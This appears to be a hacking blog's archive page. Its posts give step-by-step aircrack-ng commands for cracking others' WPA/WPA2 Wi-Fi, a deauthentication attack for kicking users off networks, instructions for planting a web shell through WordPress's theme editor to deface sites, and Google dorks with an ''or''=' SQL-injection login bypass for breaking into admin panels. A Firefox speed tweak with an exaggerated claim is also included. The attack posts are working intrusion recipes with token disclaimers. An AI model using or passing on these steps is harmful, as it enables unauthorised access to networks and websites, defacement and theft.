Showing posts with label amit vijayan. Show all posts
Showing posts with label amit vijayan. Show all posts

How to hack Any Wifi Network (WPA/WPA2)

Wifi Hacking (WPA/WPA2)


Wifi is surely a difficult task , but not for the one's who are using Kali linux. 
There are many wifi protocols followed in order to  protect the network but with some tools any wifi network can be Hacked.
"Rules are meant to be broken

For WPA/WPA2 hacking, we need  Kali Linux, Network Adapter 
Execute the following commands

1. ifconfig wlan up (just to ensure our wlan is active)

2. airmon-ng      (to ensure our network card is working)

3. airmon-ng check kill (kills the process that may harm our attack)

4. airmon-ng start wlan1 (starts monitor mode)

5. airodump-ng wlan1

6. airodump-ng --bssid "MAC id of the router" --channel "on which channel it is on " wlanmon1

this command dumps the information of the router , for eg number of devices connected on this network along with the device mac id.

7. airodump-ng --channel "channel number"  --bssid "Station Address" -w /root/WPAsample wlan1mon

now the information is stored in root under the file name of WPAsample

Now open a new terminal 

8. aireplay-ng   --deauth 2000 -a "Mac Address " -c "Victim's Mac Address " wlan1mon

aireplay is a  tool used in Kali Linux which is used to send de-authentication packets. The purpose of de-authentication packets is to kick the existing user out from the network and force him to reconnect.

Open in new terminal 

9. aireplay-ng -0 1 -a " BSSID " -c "Victims Address " wlan1mon

10. aircrack-ng  -w " Location of the password list" " Location of the file "

Video Tutorial of WPA/WPA2 for reference 

                     

    ================================================

How to kick your friend from using from Wifi?

Kali Linux  De-Authentication Attack


How to Kick your friend from Using your wifi without him knowing about it . 


Its very hard to say no, specially to your Friends. You can do nothing if they ask for your Wifii password and then choose to stay because they are too lazy to go back home. 
Now there is a way to stop there usage without them knowing about that. :)

De-authentication is a simple attack used in Kali Linux which kicks the desired target from your Wifii Network. If you are creative, you can even use this attack for hacking Wifii passwords
(This post is for education purpose only, I am not responsible for any of your actions)

Tools Required :
1. Vmware 

2. Kali linux 

3. Network Adapter (which is Compatible with Kali)
(Alpha or Tp-Link)


Watch this video, and if you need any help, support is available 24x7. 




Wireless Hacking

What is Wireless?



Wireless communication is the transfer of information or power between two or more points that are not connected by an electrical conductor.

The most common wireless technologies use radio. With radio waves distances can be short, such as a few meters for television or as far as thousands or even millions of kilometers for deep-space radio communications. It encompasses various types of fixed, mobile, and portable applications, including two-way radios, cellular telephones, personal digital assistants (PDAs), and wireless networking. Other examples of applications of radio wireless technology include GPS units, garage door openers, wireless computer mice,keyboards and headsets, headphones, radio receivers, satellite television, broadcast television and cordless telephones

Wireless Hacking 



An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.


Now to hack a Wifi Password you must first know what type of encryption it uses for its passwords there are many different types such as: WEP (easiest to crack/hack), WPA and WPA2.


Types Of Encyption 

- WEP
- WPA
- WPA2

WEP

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN.

WPA


The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.

The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.

WPA2

WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode with strong security. Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark
==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x

LETS START WIFI HACKING

(to be continued............)




How to upload shell in wordpress

Hey fellas,my last post was about gaining access to a site,whats next..any idea?? Here it is,gaining access is not what we need. Our main motive is to gain access over other sites on the server. So the method for this is SHELL UPLOADING.



What is Shell Uploadin?

A shell is software that provides an interface for users of an operating system to access the services of a kernel. However, the term is also applied very loosely to applications and may include any software that is "built around" a particular component, such as web browsers and email clients that are "shells" for HTML rendering engines. The name shell originates from shells being an outer layer of interface between the user and the internals of the operating system (the kernel).Blah blah blah..This is according to Wiki, All you just to need to know is that a shell is an Interface to interact with the other sites on the server.
If u know more about shells refer this http://en.wikipedia.org/wiki/Shell_(computing)
This tutorial is for educational purpose only. I am not responsible for any harm caused, So use your knowledge wisely.
So lets start...!!

WORDPRESS SHELL-UPLOADING

Wordpress is an common platform used by many to developers to build there sites. So a common vulnerability to Wordpress is that it shows of its admin page.To make this working you must have the admin rights of the site. Check  www.site.com/wp-admin
1:  After you login the admin account Click on Appearence then Editor.


2: In the Editor bar select a theme (i prefer twenty ten) and select 404.php . Now here comes the most important part, delete the code of 404.php and replace it with your shell source code and save it. Don't worry I will be providing you the shell source code :D


3: We are almost done now,after you save your shell source code check out your shell link. 
www.site.com/wo-content/themes/name-of-the-theme/404.php

Here i used twenty ten as a theme,so now my shell link would be
www.site.com/wp-content/themes/Twenty Ten/404.php

                      WHATS NEXT?

                   After you upload your SHELL, u can:
                   1:Earn money through your Shell Links.
                   2:Show off your friends.
                   3:You can deface any WEBSITE

         || Here's an example how a deface page looks :D ||




I hope it was usefull. Always be an ETHICAL HACKER. 

Hack a Website in 3 simple steps.

               WEBSITE HACKING IN 3 SIMPLE STEPS

                               

STEP 1: search for an google hacking dork. A dork is passage through which an attacker can gain access to a website.There are many many google hacking dorks I will just take one.For more dorks just search"google hacking dorks". This will help you get many websites.
 DORK example:
inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx
I will be using this one:-Inurl:adminlogin "city"


STEP 2: Click on any site which is listed. An admin login page will appear on the screen.
NOTE: if the site has protection then this method will not work.
for eg:


STEP 3: After we get the login page the only process left is the authentication process. A user name and a password is to be filled which only the admin knows. So for this we will use SQL injection.
Just fill Username : admin
passowrd: 'or''='
(This is the basic combination)
NOTE: there are many combinations of SQL, if this combonation doesnt work try another one there are many.
After filling the username and password you now gain access to the website.

(this is the dashboard of the website)

This is an educational tutorial. I donnot take responsibility for any damage caused.I hope this tutorial will help you in many ways. Always be an Ethical Hacker.
HAPPY HACKING


Increase Firefox Browsing Speed

How to make Mozilla Firefox 30 times faster






1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it
recieves.


If you're using a broadband connection you'll load pages 2-30 times faster now.

Amit Vijayan

Amit Vijayan
Hack Ethically

About Me


I am an engineering student and i am very dedicated about Ethical Hacking. I have been learning "Ethical Hacking" for about 4 years now.
Though I'am not a pro hacker but also not a noob. I have enough knowledge to give others like me, a start for their Ethical Hacking & Cyber Security. As i keep learning new things, i keep updating them on the blog from basic to advanced level.
I started Ethical Hacking as a hobby which has now turned into my passion and i'am sure i will turn it into my profession through this blog.

Always be an Ethical Hacker.